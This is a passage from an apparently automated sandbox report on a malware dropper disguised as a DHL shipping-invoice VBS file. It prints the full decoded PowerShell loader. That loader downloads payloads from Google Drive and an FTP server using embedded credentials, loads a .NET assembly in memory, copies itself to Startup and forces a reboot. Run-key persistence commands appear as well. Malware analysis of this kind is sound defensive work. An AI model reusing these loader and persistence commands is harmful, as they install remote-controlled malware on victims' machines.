[char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeAJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D400BD pushad ; iretd 2_2_00007FF848D400C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D7000A push ebp; ret 4_2_00007FF848D7002B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E423A3 push 8B485F92h; iretd 4_2_00007FF848E423AB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E4235D push 8B485F92h; retf 4_2_00007FF848E42365
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E4001C push edi; ret 4_2_00007FF848E4003B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C6D2A5 pushad ; iretd 5_2_00007FF848C6D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D885BD push ebx; ret 5_2_00007FF848D885DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D8861D push ebx; ret 5_2_00007FF848D8861A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D885FA push ebx; ret 5_2_00007FF848D8861A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D82315 pushad ; iretd 5_2_00007FF848D8232D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D8843D push ebx; ret 5_2_00007FF848D8843A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D883FB push ebx; ret 5_2_00007FF848D8843A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E516B8 push eax; ret 5_2_00007FF848E516B9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C4D2A5 pushad ; iretd 6_2_00007FF848C4D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D625FD push edx; retf 6_2_00007FF848D62626
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D5613C push ebp; ret 13_2_00007FF848D561D8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D5814D push ebx; ret 13_2_00007FF848D5816A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D58118 push ebx; ret 13_2_00007FF848D5816A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D516D3 pushfd ; ret 13_2_00007FF848D516EA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D50A98 pushad ; ret 13_2_00007FF848D50AE2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D500BD pushad ; iretd 13_2_00007FF848D500C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D50845 push E95DA13Ch; ret 13_2_00007FF848D50899
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D50855 push E95DA13Ch; ret 13_2_00007FF848D50899
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10002806 push ecx; ret 15_2_10002819
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF848D63512 pushad ; ret 18_2_00007FF848D63521
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF848D65CEC push ds; iretd 18_2_00007FF848D65CEF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00457186 push ecx; ret 20_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0045E55D push esi; ret 20_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00457AA8 push eax; ret 20_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00434EB6 push ecx; ret 20_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0044693D push ecx; ret 21_2_0044694D
                      Source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                      Source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                      Source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                      Source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                      Source: 13.2.powershell.exe.1c40e200000.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                      Source: 13.2.powershell.exe.1c40e200000.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                      Source: 13.2.powershell.exe.1c40e200000.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                      Source: 13.2.powershell.exe.1c40e200000.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                      Source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                      Source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                      Source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                      Source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                      Source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                      Source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                      Source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                      Source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00406EEB ShellExecuteW,URLDownloadToFileW,20_2_00406EEB

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_ppc cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exitJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_ppcJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_ppcJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
